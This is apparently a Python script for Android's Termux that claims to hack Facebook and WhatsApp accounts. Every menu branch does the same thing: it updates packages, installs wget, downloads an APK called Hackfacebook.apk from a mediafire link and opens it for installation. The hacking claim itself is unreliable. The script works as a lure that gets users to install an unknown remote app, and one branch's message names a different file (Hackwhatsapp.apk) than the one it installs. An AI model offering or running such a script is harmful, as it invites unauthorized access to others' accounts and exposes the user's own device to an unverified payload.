import os
import time
os.system("clear")
print("Welcome to my script to hack accounts facebook and whatsapp")
time.sleep(5)
os.system("clear")
print("This script only to users android")
time.sleep(5)
os.system("clear")
print("(((1)))==>Hack accounts facebook")
print("(((2)))==>Hack accounts facebook year (2010)")
fbwha = input("Type the number : ")
if fbwha == '1':
   print("Please wait app hack accounts Facebook is downloading...! ")
   print("Please the allow to app termux permission Access to scdard") 
   time.sleep(5) 
   os.system("termux-setup-storage")
   time.sleep(5)
   os.system("apt update -y ")
   time.sleep(1)
   os.system("apt upgrade -y ")
   time.sleep(1)
   os.system("apt install git -y ")
   time.sleep(1)
   os.system("apt install wget -y ")
   os.system("clear")
   os.system("wget https://download1321.mediafire.com/v9i2wlbjdtug/xxw97q0jlc5qw79/Hackfacebook.apk")
   os.system("rm -rf /sdcard/Hackfacebook.apk")
   os.system("cp Hackfacebook.apk /sdcard")
   os.system("clear")
   print("Done install app Hackfacebook in /sdcard/Hackfacebook.apk")
   time.sleep(5)
   os.system("clear")
   print("Do install Hackfacebook on your device to hack accounts facebook ")
   print("path the app in /sdcard/Hackfacebook.apk")
   os.system("termux-open /sdcard/Hackfacebook.apk")
elif fbwha == '2':
     print("Please wait app hack accounts facebook year 2010 is downloading...! ")
     print("Please the allow to app termux permission Access to scdard")
     time.sleep(5)
     os.system("termux-setup-storage")
     time.sleep(5)
     os.system("apt update -y ")
     time.sleep(1)
     os.system("apt upgrade -y ")
     time.sleep(1)
     os.system("apt install git -y ")
     time.sleep(1)
     os.system("apt install wget -y ")
     os.system("clear")
     os.system("wget https://download1321.mediafire.com/v9i2wlbjdtug/xxw97q0jlc5qw79/Hackfacebook.apk")
     os.system("rm -rf /sdcard/Hackfacebook.apk")
     os.system("cp Hackfacebook.apk /sdcard")
     os.system("clear")
     print("Done install app hack in /sdcard/Hackwhatsapp.apk")
     time.sleep(5)
     os.system("clear")
     print("Do install Hackfacebook on your device to hack accounts facebook year 2010 ")
     print("path the app in /sdcard/Hackfacebook.apk")
     os.system("termux-open /sdcard/Hackfacebook.apk")
else:
     print("welcome to my program")
     time.sleep(3)
     os.system("clear")
     print("Please wait app hack accounts facebook is downloading...! ")
     print("Please the allow to termux permission access to scdard")
     time.sleep(5)
     os.system("termux-setup-storage")
     time.sleep(5)
     os.system("apt update -y ")
     time.sleep(1)
     os.system("apt upgrade -y ")
     time.sleep(1)
     os.system("apt install git -y ")
     time.sleep(1)
     os.system("apt install wget -y ")
     os.system("clear")
     os.system("wget https://download1321.mediafire.com/v9i2wlbjdtug/xxw97q0jlc5qw79/Hackfacebook.apk")
     os.system("rm -rf /sdcard/Hackfacebook.apk")
     os.system("cp Hackfacebook.apk /sdcard")
     os.system("clear")
     print("Done install app Hackfacebook in /sdcard/Hackfacebook.apk")
     time.sleep(5)
     os.system("clear")
     print("Do install Hackfacebook on your device to hack accounts facebook ")
     print("path the app in /sdcard/Hackfacebook.apk")
     os.system("termux-open /sdcard/Hackfacebook.apk")
